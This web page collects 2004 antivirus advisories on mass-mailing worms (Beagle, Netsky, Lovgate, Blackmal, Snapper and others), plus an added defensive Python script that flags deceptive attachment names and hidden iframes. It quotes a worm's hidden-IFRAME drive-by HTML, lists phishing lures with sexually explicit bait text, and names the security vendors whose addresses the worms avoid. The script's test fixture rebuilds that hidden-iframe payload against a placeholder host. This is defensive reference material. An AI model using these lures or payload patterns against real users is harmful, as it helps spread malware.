W32.Beagle.R@mm is a variant of W32.Beagle.O@mm. This worm attempts to send an HTML email to the addresses found in the files on an infected computer. The email does not contain an attachment of the worm. Instead, the HTML email uses the Microsoft Internet Explorer Object Tag Vulnerability that allows for the automatic download and execution of a file hosted on a remote Web site. This file is a copy of the worm, but may change in the future.

The worm also opens a backdoor, starts a Web server on port 81 to serve the worm, and attempts to spread through file-sharing networks by copying itself to the folders with "shar" in their names. The worm is also a file infector that appends itself to the .exe files found in the c:\emails folder on the computer.


--------------------------------------------------------------------------------
Note: If the current year is 2006 or later, the worm will not infect the computer.

Obtain the patch as described in Microsoft Security Bulletin MS03-040

Uses its own SMTP engine to send itself to the email addresses it collected. The worm contains its own MIME-encoding routine and will compose the email in memory.

The email has the following characteristics:

From: (One of the following)
management@<recipient domain>
administration@<recipient domain>
staff@<recipient domain>
antivirus@<recipient domain>
antispam@<recipient domain>
noreply@<recipient domain>
support@<recipient domain>


Subject: (One of the following)
Account notify
E-mail account disabling warning.
E-mail account security warning.
E-mail technical support message.
E-mail technical support warning.
E-mail warning
Email account utilization warning.
Email report
Encrypted document
Fax Message Received
Forum notify
Hidden message
Important notify
Important notify about your e-mail account.
Incoming message
Notify about using the e-mail account.
Notify about your e-mail account utilization.
Notify from e-mail technical support.
Protected message
RE: Protected message
RE: Text message
Re: Document
Re: Hello
Re: Hi
Re: Incoming Fax
Re: Incoming Message
Re: Msg reply
Re: Thank you!
Re: Thanks :)
Re: Yahoo!
Request response
Site changes
Warning about your e-mail account


Body:
The body of the email will appear as a blank message, but will contain HTML code that will not be visible, and will automatically download and execute the worm from a remote Web site using the Internet Explorer Object Tag Vulnerability described in Microsoft Security Bulletin MS03-032.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.r@mm.html


W32.Beagle.S@mm
Discovered March 18, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.S@mm is a variant of W32.Beagle.O@mm. This worm attempts to send an HTML email to addresses found in files on an infected computer. The email does not contain an attachment of the worm. Instead, the HTML email uses the Microsoft Internet Explorer Object Tag Vulnerability that allows for the automatic download and execution of a file hosted on a remote Web site. This file is a copy of the worm, but may change in the future.

The worm also opens a backdoor, starts a Web server on TCP port 81 to serve the worm, and attempts to spread through file-sharing networks by copying itself to the folders with "shar" in their names. The worm is also a file infector that appends itself to the .exe files found in the c:\emails folder on the computer.

Obtain the patch as described in Microsoft Security Bulletin MS03-040

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.s@mm.html


W32.Beagle.T@mm
Discovered March 18, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.T@mm is a variant of W32.Beagle.R@mm. This worm attempts to send an HTML email to the addresses found in the files on an infected computer. The email does not contain an attachment of the worm. Instead, the HTML email uses the Microsoft Internet Explorer Object Tag Vulnerability that allows for the automatic download and execution of a file hosted on a remote Web site. This file is a copy of the worm, but may change in the future.

The worm also opens a backdoor, starts a Web server on port 81 to serve the worm, and attempts to spread through file-sharing networks by copying itself to folders with "shar" in their names. The worm is also a file infector that appends itself to the .exe files found on the computer.

Obtain the patch as described in Microsoft Security Bulletin MS03-040

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.t@mm.html


W32.HLLW.Lovgate.N@mm
Discovered March 17, 2004

Systems Affected: All Windows32 Systems

W32.HLLW.Lovgate.N@mm is a variant of W32.HLLW.Lovgate@mm. This variant is also a mass-mailing worm that attempts to email itself to all the email addresses it finds in the system. The "sender" of the email is spoofed, and the subject line and message body vary.

This worm also attempts to copy itself to all the computers on a local network and the KaZaA shared folder.

Releases confidential info: Steals system information and sends it to the hacker.
Compromises security settings: Terminates processes belonging to various security programs.
Replies to all the incoming messages when they arrive in the mailbox of certain MAPI-compliant email clients, which include Microsoft Outlook.

If the original email is:

Subject: <subject>
From: <someone>@<somewhere.com>
Message: <original message body>

the worm will attempt to send the following email:

Subject: Re: <subject>
To: <someone>@<somewhere.com>
Message:
'<someone>' wrote:
====
> <original message body>
>
====

<sender's domain> account auto-reply:

followed by one of the following:

If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.

> Get your FREE <sender's domain>now! <

Attachment: The attachment is one of the following:

the hardcore game-.pif
Sex in Office.rm.scr
Deutsch BloodPatch!.exe
s3msong.MP3.pif
Me_nude.AVI.pif
How to Crack all gamez.exe
Macromedia Flash.scr
SETUP.EXE
Shakira.zip.exe
dreamweaver MX (crack).exe
StarWars2 - CloneAttack.rm.scr
Industry Giant II.exe
DSL Modem Uncapper.rar.exe
joke.pif
Britney spears nude.exe.txt.exe
I am For u.doc.exe

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.lovgate.n@mm.html


W32.HLLW.Polybot
Discovered March 19, 2004

Systems Affected: All Windows32 Systems

W32.HLLW.Polybot is a worm that attempts to spread through network shares that have weak passwords and allows attackers to access an infected computer using a predetermined IRC channel.

The worm uses multiple vulnerabilities to spread, including:

• The DCOM RPC vulnerability (described in Microsoft Security Bulletin MS03-026) using TCP port 135.
• The RPC locator vulnerability (described in Microsoft Security Bulletin MS03-001) using TCP port 445.
• The WebDav vulnerability (described in Microsoft Security Bulletin MS03-007) using TCP port 80.

Releases confidential info: Allows unauthorized remote access.
Compromises security settings: Terminates antivirus and firewall processes.

Allows an attacker to remotely control a compromised computer and perform any of the following actions:

• Download and execute files
• Steal system information
• Harvest email addresses
• Steal CD keys for various games

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.polybot.html


W32.HLLW.Antinny.G
Discovered March 19, 2004

Systems Affected: All Windows32 Systems

The W32.HLLW.Antinny.G worm is a variant of W32.HLLW.Antinny. It spreads using the Winny file-sharing network.

The worm steals personal information, including name, email and files, and sends it to a file-sharing network.

The worm has the Notepad icon or a Windows folder icon.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.antinny.g.html


W32.Witty.Worm
Discovered March 20, 2004

Systems Affected: All Windows32 Systems

W32.Witty.Worm utilizes a Vulnerability in ICQ Parsing by ISS Products. The worm sends itself out to multiple IP addresses on source port 4000/UDP and a random destination port. The worm is a memory-only based threat and does not create files on the system.

The worm has a payload of overwriting random sectors of a random hard disk.

NOTE: If your system is not running a vulnerable version of one of the products affected, then you will not be infected. Products affected by this vulnerability are listed below:

BlackICE™ Agent for Server 3.6 ebz, ecd, ece, ecf
BlackICE PC Protection 3.6 cbz, ccd, ccf
BlackICE Server Protection 3.6 cbz, ccd, ccf
RealSecure® Network 7.0, XPU 22.4 and 22.10
RealSecure Server Sensor 7.0 XPU 22.4 and 22.10
RealSecure Desktop 7.0 ebf, ebj, ebk, ebl
RealSecure Desktop 3.6 ebz, ecd, ece, ecf
RealSecure Guard 3.6 ebz, ecd, ece, ecf
RealSecure Sentry 3.6 ebz, ecd, ece, ecf

If you are running a product that has the vulnerability used by the worm, we recommend that you apply the relevant patch as soon as possible. Patches for this vulnerability are available at http://blackice.iss.net/update_center/index.php.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.witty.worm.html


W32.Netsky.Q@mm
Discovered March 21, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.Q@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The "sender" of the email is spoofed, and the subject line and message body vary. The attachment name varies and has an .exe, .pif, .scr, or .zip file extension.

The worm also tries to spread through various file-sharing methods by copying itself into directories under enticing file names.

Deletes these values:

Explorer
system.
msgsvr32
winupd.exe
direct.exe
jijbl
service
Sentry

from the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


Deletes the values:

system.
Video

from the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices


Deletes these values:

Explorer
au.exe
direct.exe
d3dupdate.exe
OLE
gouday.exe
rate.exe
Taskmon
Windows Services Host
sysmon.exe
srate.exe
ssate.exe
winupd.exe

from the registry key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


Deletes the following subkeys:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WksPatch
HKEY_CLASSES_ROOT\CLSID\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32

The email has the following characteristics:

From: <Spoofed>

Subject: The subject line is one of the following:

Re: Encrypted Mail
Re: Extended Mail
Re: Status
Re: Notify
Re: SMTP Server
Re: Mail Server
Re: Delivery Server
Re: Bad Request
Re: Failure
Re: Thank you for delivery
Re: Test
Re: Administration
Re: Message Error
Re: Error
Re: Extended Mail System
Re: Secure SMTP Message
Re: Protected Mail Request
Re: Protected Mail System
Re: Protected Mail Delivery
Re: Secure delivery
Re: Delivery Protection
Re: Mail Authentification


The worm avoids sending to the email addresses that contain any of the following strings:

"@microsof"
"@antivi"
"@symantec"
"@spam"
"@avp"
"@f-secur"
"@bitdefender"
"@norman"
"@mcafee"
"@kaspersky"
"@f-pro"
"@norton"
"@fbi"
"abuse@"
"@messagel"
"@skynet"
"@pandasof"
"@freeav"
"@sophos"
"ntivir"
"@viruslis"
"noreply@"
"spam@"
"reports@"

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.q@mm.html


W32.Netsky.P@mm
Discovered March 21, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.P@mm (also known as W32.Netsky.Q@mm) is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into various shared folders.

The From line of the email is spoofed, and the Subject line and message body vary. The attachment name varies and has an .exe, .pif, .scr, or .zip file extension.

The worm uses the Incorrect MIME Header Can Cause IE to Execute E-mail Attachment vulnerability to cause unpatched systems to auto-execute the worm when reading or previewing an infected message.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.p@mm.html

Download the removal tool here


W32.HLLW.Lovgate.O@mm
Discovered March 23, 2004

Systems Affected: All Windows32 Systems

W32.HLLW.Lovgate.O@mm is a variant of W32.HLLW.Lovgate@mm. This variant is also a mass-mailing worm that attempts to reply to all the email messages in the Microsoft Outlook Inbox. The "sender" of the email is spoofed, and its subject line and message vary. The attachment name varies with a .exe, .pif, or .scr file extension.

This worm also attempts to copy itself to all the computers on a local network and to Kazaa-shared folders.

Compromises security settings: Terminates processes belonging to various antivirus programs.

Replies to all the incoming messages when they arrive in the mailbox of certain MAPI-compliant email clients, which include Microsoft Outlook.

If the original email is:

Subject: <subject>
From: <sender>@<domain.com>
Message: <original message body>

the worm will attempt to send the following email:

Subject: Re: <subject>
To: <sender>@<domain.com>

Message:
'<sender>' wrote:
====
> <original message body>
====

<domain.com> account auto-reply:

If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.

> Get your FREE <domain.com> account now! <

Attachment: The attachment is one of the following:

the hardcore game-.pif
Sex in Office.rm.scr
Deutsch BloodPatch!.exe
s3msong.MP3.pif
Me_nude.AVI.pif
How to Crack all gamez.exe
Macromedia Flash.scr
SETUP.EXE
Shakira.zip.exe
dreamweaver MX (crack).exe
StarWars2 - CloneAttack.rm.scr
Industry Giant II.exe
DSL Modem Uncapper.rar.exe
joke.pif
Britney spears nude.exe.txt.exe
I am For u.doc.exe

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hllw.lovgate.o@mm.html


W32.Gaobot.SA
Discovered March 23, 2004

Systems Affected: All Windows32 Systems

W32.Gaobot.SA is a worm that attempts to spread through network shares that have weak passwords and allows attackers to access an infected computer using a predetermined IRC channel.

The worm uses multiple vulnerabilities to spread, including:

The DCOM RPC vulnerability (described in Microsoft Security Bulletin MS03-026) using TCP port 135.
The WebDav vulnerability (described in Microsoft Security Bulletin MS03-007) using TCP port 80.

Deletes files: Deletes files associated with other worms.
Modifies files: Modifies hosts file.
Compromises security settings: Terminates many security software processes. Allows total system compromise.
Ports: Opens backdoors on two randomly selected TCP ports. TCP 80 and 135.
Shared drives: Copies itself to network shares.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.gaobot.sa.html


W32.Blackmal@mm
Discovered March 23, 2004

Systems Affected: All Windows32 Systems

W32.Blackmal@mm is a mass-mailing worm. It uses its own SMTP engine to email itself to all the contacts in MSN Messenger and Yahoo Pager, and to those in the files whose extensions are .htm or .dbx. The email message has a randomly chosen subject line, message, and attachment. The attachment will have a .src, .exe, .zip, or .tgz file extension.

W32.Blackmal@mm uses Windows Media Player presentation to mask its malicious intentions and attempts to delete security software and system files.

Large scale e-mailing: Emails itself to all the contacts in MSN Messenger and Yahoo Pager, as well as to those in the files whose extensions are either .htm or .dbx.
Deletes files: All files or executables in the following directories:

%Program Files%\Norton AntiVirus\
%Program Files%\McAfee\McAfee VirusScan\Vso\
%Program Files%\Trend Micro\PC-cillin 2002\
%Program Files%\Trend Micro\PC-cillin 2003\
%Program Files%\Trend Micro\Internet Security\
%Program Files%\Symantec\LiveUpdate\

Email Routine Details
The worm uses its own SMTP engine to email itself to all the email addresses listed in MSN Messenger and Yahoo Pager, as well as in all the files whose extensions are either .htm or .dbx. It attempts to send the email through the default SMTP server address that the infected computer uses. If the worm cannot find this information, it will use one of the many SMTP server addresses that are hard-coded into the worm.

Subject: (Some possible subject lines are listed below.)
Alert
Fw: Virus Alert
FW: (-Sucking-)
FW: File - WebCam.mpeg
FW: **Hot Movie**
Re: Why? Form Back.mpg
FW:RE: Least *21* Years
Re: Double suck (movie)
FW:Re:Hot Erotic
very hot XXX
Video Clip
RE: FW: Women Mpeg
Asses Mpeg's
FW: Lesbian & gays Mpeg
Fw: My Funny Ass

Body: (Some possible message bodies are listed below.)

This email is sent to you because one
or some of your friends has been infected
with The W32.BlackWorm.A@mm
Virus.
And you could be infected
too.This Virus has the ability to
damage the hard disk.
This Virus infects computers using many
new ways :
1- it arrives as an email attachment
inside of jpg pictures.
2- it infects the ip address without
the victim's knowledge.
3- it infects Microsoft Word Documents
using a new exploit in hex (00fxf0xf10x).
Symantec Security Response has attached a removal
tool to clean and prevent the infections of
W32.BlackWorm.A@mm

Cum and check this fun group out...Sexy ladies!! Come post your ad,..this is a real swingers group!!
I'm attatching a Video Clip of my wife if interested in checking it out!
Watch the Paris Hilton Sex Tape for Free!
Video's Girls Erotic WebCam's Tits Mpeg's Girls Ass SEX Pussy Video Clips
Here is another Vclip of my daily group :|
All kinda Women Can be Found Here To Satisfy Women Lovers' Eyes
Dozens of Free Video Clips to download.Many Niches. Updated regularly and more added daily.Taken From Vivi's Lovely Briefcase.
hey guys my name is April Goostree i am a sexy 22 yr old bbw , 5'9, 48 dd , big ole booty, jus lovin life, until i get my pics posted in here you can either check out my profile or join my own yahoo group Texas-Sexy@groups.msn.com, either way works for me..i hope to become very active in this group, i like to get to know people, like to get on cam once in a while, jus to chill, when they aint none home..thats why its once in a while yaknow..anyways jus holla at me... n thanks for lettin me join!!! kisses kandee..Bye
very good movie >>> Video's Media Player. SEX SEX * Sluts Tits Video Mpeg's Mpeg Video Clips
-==This server does not support Transfer Big Movies==- wo Hotttt gurls sucking a hansum cock Softly
u Love asses? Here is a great ass open wide waitin for ur lil Cock
movie attached open by media Player 7.1
when i saw my ass i slept 3 hours why?? check my ass sorry my movie
LOOOOOOOOL joke (^!^)
Check This ?ucking Babe ;D

Attachments: (Some possible file names are listed below.)

Julia_1997_Fucking.MPEG_.scr
juanita_in_the_kitchen.MPEG.scr
17Ag_double_suck__part[2].MPEG_.scr
April_FromTexas.MPEG_.scr
Video_briefcase_Group[13].MPEG_.scr
After_2AM_small_room[4].MPEG__.scr
Graham_Hilton_Sex[4].MPEG__.scr
WebCam_12girls_Ass.mpeg_.scr
Shakira_Anal_very_old.MPEG.scr
why_fuck_anal_back.MPEG.scr
open_girl_21year.MPEG.scr
Ricky_Gay_ass.MPEG______________.scr
GrahamCluley_freakin_Ass_.MPEG__.scr
Sexual_Crimes.MPEG____.scr
Fix_BlackWorm.com

or

hard_babe
AprilGoostree
Video
JuliaRoberts
BigFuck
hotsucking
ParisHilton
Shakira
Vclip2
easyFuck_GIRL
RickyMartin
AssClip
SexCrimes
Scan

The above filenames are followed by one or two of the following file extensions:
.zip
.exe
.tgz

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.blackmal@mm.html


W32.Snapper.A@mm
Discovered March 24, 2004

Systems Affected: All Windows32 Systems

W32.Snapper.A@mm is a worm that spreads to all the contacts in the Windows Address Book.
It does not send itself as an email attachment. Instead, it exploits the Internet Explorer Object
Tag Vulnerability that is described in Microsoft Security Bulletin MS03-032. This vulnerability
allows W32.Snapper.A@mm to automatically download and install the worm when the email is opened.

The email has the following characteristics:

From: <Spoofed>
Subject: Re:
Message: The message body consists of the following HTML code, which will appear to be a blank message when loaded by most mail clients:

<HTML><BODY><IFRAME src='http://<omitted>/banner.htm' style='display:none'></IFRAME></HTML></BODY>

Payload: May display popup advertisements.
Large scale e-mailing: Mass-mails itself to contacts in the Windows Address Book
Compromises security settings: Terminates some antivirus processes.

Uses its own SMTP engine to send a message to all the contacts in the Windows Address Book.

When an email client loads this message, it downloads and displays the file Banner.htm.


Banner.htm
At the time of this writing, Banner.htm is a Web page that appears to be blank, but actually contains links to the worm. This page uses the Internet Explorer Object Tag Vulnerability described in Microsoft Security Bulletin MS03-032 to automatically download a malicious html file, Htmlhelp.cgi.

Htmlhelp.cgi
This is an HTML file containing an encoded copy of the worm .dll. This file contains a VBScript that installs the worm as %Windir%\ieload.dll.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.snapper.a@mm.html
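
The deceptive attachment names listed for Lovgate and Blackmal above (double extensions, underscore padding before .scr) and the hidden IFRAME body used by Snapper can both be caught with simple checks at a mail gateway. The following is an added example, not part of the original advisory or of any Symantec tool; the function names, the decoy-extension list and the sample messages (host gateway.example.invalid) are constructed for illustration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Extensions Windows runs directly; each appears in the attachment lists above.
EXECUTABLE_EXTS = {".exe", ".pif", ".scr", ".com"}
# Harmless-looking extensions used as decoys (assumed list, extend as needed).
DECOY_EXTS = {".doc", ".txt", ".zip", ".rar", ".rm", ".avi", ".mp3", ".mpeg", ".mpg"}


def attachment_findings(filename):
    """Return the reasons an attachment name looks deceptive (empty if none)."""
    name = filename.strip().lower()
    parts = name.split(".")
    final_ext = "." + parts[-1]
    if len(parts) < 2 or final_ext not in EXECUTABLE_EXTS:
        return []
    findings = ["executable extension " + final_ext]
    # Inner extensions, with trailing "_" or space padding stripped (".mpeg__").
    inner = {"." + p.rstrip("_ ") for p in parts[1:-1]}
    if inner & (DECOY_EXTS | EXECUTABLE_EXTS):
        findings.append("double extension")
    # Padding pushes the real extension out of view in a narrow column.
    if re.search(r"[_ ]{2,}\.[a-z0-9]+$", name):
        findings.append("padding before extension")
    return findings


class HiddenFrameFinder(HTMLParser):
    """Collect <iframe>/<object> tags that are invisible and load remote content."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "object"):
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ("display:none" in style or "visibility:hidden" in style
                  or a.get("width") == "0" or a.get("height") == "0")
        target = (a.get("src") or a.get("data") or "").lower()
        if hidden and target.startswith(("http://", "https://")):
            self.hits.append(tag)


def triage(raw_bytes):
    """Parse one RFC 5322 message and return a list of findings."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if name:
            findings += [f"{name}: {r}" for r in attachment_findings(name)]
        elif part.get_content_type() == "text/html":
            finder = HiddenFrameFinder()
            finder.feed(part.get_content())
            findings += [f"html body: hidden remote <{t}>" for t in finder.hits]
    return findings


def constructed_samples():
    """Build three constructed test messages (no real worm content)."""
    def base(subject):
        m = EmailMessage()
        m["From"], m["To"], m["Subject"] = "a@example.invalid", "b@example.invalid", subject
        return m

    html_only = base("Re:")
    html_only.set_content(
        "<HTML><BODY><IFRAME src='http://gateway.example.invalid/banner.htm' "
        "style='display:none'></IFRAME></BODY></HTML>", subtype="html")

    double_ext = base("Re: hello")
    double_ext.set_content("more look to the attachment.")
    double_ext.add_attachment(b"constructed bytes", maintype="application",
                              subtype="octet-stream", filename="I am For u.doc.exe")

    benign = base("Minutes")
    benign.set_content("Agenda attached.")
    benign.add_attachment(b"%PDF constructed", maintype="application",
                          subtype="pdf", filename="minutes.final.pdf")
    return {"html_only": html_only.as_bytes(), "double_ext": double_ext.as_bytes(),
            "benign": benign.as_bytes()}


if __name__ == "__main__":
    for label, raw in constructed_samples().items():
        print(label, triage(raw))
```

The checks are heuristics for quarantine or review: a legitimate installer sent as SETUP.EXE is flagged too, and password-protected archives are not inspected at all.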


W32.Beagle.U@mm
Discovered March 26, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.U@mm is a variant of W32.Beagle.T@mm. The worm
sends itself as an email with a blank subject and body and a randomly
named attachment. It also opens a backdoor on TCP port 4751.
The attachment name is a random string of letters with an .exe extension.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.u@mm.html


W32.Sober.E@mm
Discovered March 27, 2004

Systems Affected: All Windows32 Systems


W32.Sober.E@mm is a variant of W32.Sober.D@mm that spreads by
sending itself as an email attachment using its own SMTP engine.

The Subject: and Body: of the email vary and are written in English.

Displays the following messages:

Graphic Modul not found
Microsoft Windows
STOP: 0x80070725 {FatalSystemError}
System File [filename].exe
Connection lost or blocked by Firewall

Emails itself with the following characteristics.

The From field will consist of one of the following strings followed by @gmx.net or @gmx.de:
aRuder
g.rulers
S.Serger
Dude-X777
Nicole.Pam
R.Summer
T.Welder
Susan.Ewing
E.Ruders
Blond.Sybil
Michelle.Horn
Sabine.S-1977
E.Juller
Pamela-S
J.Moders
Regina-1978
BMueller4
Elsbeth.Sinker
Thomas.Schmahler
Nikki.1978
D.Rotter
Patricia.1979
Patty.Geldorf
H.Molma
Birgit.Muse
Peter.Selders
Johanna.1980
Nicole.Gellert
R.Niere
P.Schulz1
Kalif.Rent
Herbert.Weed
FParker
Samatha.Kelis
Kate.Lee
Bibi.Besen
Julia.Witt1
Alexander.Bendher
Rosemarie.Hetter
A.Rebert
Elke.Duerr
D.Winter1
Angelika.Neum
A.Kempen
KevinEder
Susan.Leet
Friedhelm.alt
Seth.Liveima
Eileen.Leen
D.Augustam
B.Kaine
MikeLord
Kathe.Meet
Marie.Dreher
Tom.Schon
Lisa.Redfield
P.Schulz1
C.Poller
Ulrike.Falkner
b.sieber006
Jundel
A.Mack1
R.Kleinmaurer
S.Loltke

The Subject will consist of one of the following strings:
Hi
hi
Hi :-)
Ok ;-)
OK OK
OK Ok OK!
Hey!
Thx !!!

followed by
Message-ID: <%Random_String%.qmail>

The Body of the message will contain:
;-)
ha!
HA :-)
yo!
lol
LoL
LOL
Yo!

The Attachment filename will be one of the following:
Text.zip
Text.pif
Read.zip
Read.pif
Graphic-doc.zip
Graphic-doc.pif
document.zip
document.pif
Word.zip
Word.pif

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.sober.e@mm.html


W32.Beagle.V@mm
Discovered March 29, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.V@mm is a variant of W32.Beagle.U@mm. The worm sends itself as an email with a blank subject and body and a randomly named attachment. It also opens a backdoor on TCP port 4751. The attachment name is game.exe.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.v@mm.html


W32.Netsky.R@mm
Discovered March 31, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.R@mm is a mass-mailing worm, and a variant of W32.Netsky.Q@mm. This worm has been packed with a known runtime compression utility.

Emails all addresses found in certain files on the system.

Launches many threads, which may result in system instability.

Searches files on the system for email addresses. The worm will search local and mapped drives. The worm contains its own SMTP engine, and it will compose an email message with the following characteristics.

Subject
RE: Document [%i] (where [%i] may be a random number)

From
[Spoofed]

Body
Excuse me,
the important document is attached,
Your sincerely

Attachment
Document[%i].pif

The worm will send an email message to all contacts that were found when scanning the system for email addresses, and it may send an email message to jena@yahoo.cz.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.r@mm.html

   

 

         
     
© Copyright 1999 - 2004 The Computer Wizard